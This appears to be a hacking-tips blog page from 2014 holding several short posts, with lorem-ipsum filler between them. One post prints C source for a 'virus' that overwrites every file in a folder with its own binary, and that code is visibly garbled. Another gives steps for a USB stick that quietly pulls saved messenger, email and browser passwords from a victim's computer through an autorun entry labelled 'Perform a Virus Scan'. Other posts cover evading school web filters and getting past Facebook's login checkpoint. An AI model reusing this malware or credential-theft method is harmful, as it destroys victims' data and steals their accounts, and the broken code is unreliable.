Sunday, October 26, 2014
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Wednesday, October 8, 2014
Access blocked website in college or school or net center-Proxy Server
What is Proxy?
Proxy server is some kind of a buffer between your computer and the designated internet destination. When you use a proxy server , your computer will send a request to the proxy server , then the proxy server will send it to the destination (for example a website), the destination will answer the request the proxy has sent and finally the proxy will return the data to you computer.
Reasons for using proxy servers:
- Proxy server is able to increase or decrease the speed of your connection to the Internet depending on the location of the proxy
- Proxy server ( but only anonymous) can hide your IP address (the resource you visit will retrieve the IP of the proxy, and not your
- Proxy servers can help in case some owner of an Internet resource impose restrictions for users from certain countries ( for example hulu.com is only reserved for those from United States, if you are not from United States, you can’t watch videos on hulu.com)
open the proxy server site .
when you open the browser it will ask you to get the certificate.
so click "Get certificate "
and click "ok"
Now site will be opened
The website will ask you to enter the url of site.
enter url of site you want to visit .
List of Proxy Sites:
Pricacywanted.info
Netrover.info
Hidemyass.com
Launchwebs.org
Clear5.info
Bingbot.info
Calculatepie.com
Unicornpipe.com
truckflood.com
fly proxy
Fire-proxy
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
SIMPLE VIRUS CODING on C Language
It will create Folder in a Folder in a Folder and so on ......
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Hack Passwords Using a USB Device
We need the following tools to create our rootkit. MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more… PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser
By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive.
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
How
To Sniff Passwords Using USB Drive,How To Sniff Passwords Using USB
Drive,HOW TO HACK PASSWORD USING USB DRIVE,Hack Passwords Using A Usb
Device,Hack Password Using Usb Flash Drive ,How To Hack Passwords Using
USB Drive,How To Hack Passwords Using A USB,How To Hack Saved Passwords
Using USB,How To Hack Passwords Through USB Drive,How To Make An
Auto-Hacking USB Drive,STEALLING PASSWORDS USING USB DRIVE.,Creating An
Auto Hack USB Drive Using Autorun And Batch Files,How To Hack Passwords
Using An USB Drive,How To Sniff Passwords Using USB Drive,Hack Passwords
Using USB Flash Drive,How To Hack Passwords Using Usb Drive
Softwares,Hack Passwords Using Pen Drive
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
How to Bypass Facebook Checkpoint Hack [Remove Security Questions]
How to Bypass Facebook Checkpoint Hack [Remove Security Questions]
Account from Iran
I am using the above the above given eMail Address and Password to Login
- This is shown because you logged in from different location or different computer or even different browser. If you are tagged by other. there is no option of other security questions
- Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
- After you Click Start you should complete five photo tags
- After you complete all this you can access your account. Most of them can't remember 3 month ago tags. Do you see the above screenshot of tags. the middle tagged photo. what is it. whos photo is that. who tagged it. no one can identify photos like that
- If your Account is Blocked like this and can't access. you can login in from your mobile version of facebook [m.facebook.com] in mobile version of facebook you birth dath is the security question. I f you know this login in to your account and access your photos and see who tagged you and then try to login from web version of facebook and give answer to your tags
- To get remove this tag security checkpoint. Please tell your friends to not to tag you or change your settings for tag [You can only tag yourself in a photo]
- This is shown because you logged in from different location or different computer or even different browser. If you are tagged by other. there is option of other security questions
- Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
- If you Make too many wrong answers this option will be removed and you will have only two security questions. your Mobile number and Security Questions. If you don't Have it or you have't added it. there is no help for you you account is blocked. Below is a screenshot of too many wrong answers
- To remove this type of security questions don't add friends or before your account is blocked. try the above mentioned Mobile version trick of facebook
- Your are think why i named this facebook id as anonymous because it was a ladies profile. i can't expose her personal details. sorry.
- This is shown because There are other Profiles with you Identity. Matching your profile. There is other option to recover
- Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
- If you can't pass this. Try to login from the Facebook Mentioned computer with the same browser. If you IP Address is change [not a static IP] you can't login in. your account is blocked permanently
- To remove this type of security questions. try the above mentioned Mobile version trick of facebook. you can unlock this only if you know your date of birth. If you don't know this your account is blocked.
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Beware Of Making Money Online On Scam Websites ..
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
How To Download APK Files Directly From Google Play?
- Go to http://codekiem.com/2012/02/24/apk-downloader
- Download the extension from the link provided above
- Go to the ‘Tools’ menu of your Chrome and select ‘Extensions’.
- Locate the file you just downloaded (with extension ‘.crx’)
- Now drag the file to your Extensions page.
- For confirmation look for a small Play Store icon on your address bar
- Select the ‘options’ button on the menu
- Enter the Gmail ID (the one required for Play Store)
- Enter your password and device ID of your android device
- Dial “*#*#8255#*#*” from your android phone
- Go to Google Play Store
- Download ‘Device ID’
Getting APK of an app is simple, just locate the app you want (on Play Store) and clicking on the APK icon on your address bar will get you your precious APK for that app. Another good thing about APK package is that it makes app sharing simple, now you can share an app with your friends by simply transferring the package to their device.
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Fraudsters Shall Not Pass - Simple Advices On How To Avoid Scammers In Social Networks
Fraudsters do not disdain playing on the heartstrings. They can write everything, that there’s an accident, you’re in a hospital, etc. So today we’ll study to confront fraudsters and keep our nerves and money safe.
Consequences
Advice
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
3 Basic Tips to Prevent A DDoS Attack
There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.
1. Buy More Bandwidth.
2. Opt for DDoS Mitigation Services.
3. Restricted Connectivity.
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.
Computer Hacking in the New Age, All you Need to Know about Hacking Today
- Worms: These are the programs which propagate through networks.
- Trojans: These are hidden in websites, attached files and emails.
- Viruses: These attach themselves to various kinds of files. They can damage certain functions of your computer.
New Age...
Viruses
Getting Administrative Access
Morbi aliquam fringilla nisl. Pellentesque eleifend condimentum tellus, vel vulputate tortor malesuada sit amet. Aliquam vel vestibulum metus. Aenean ut mi aucto.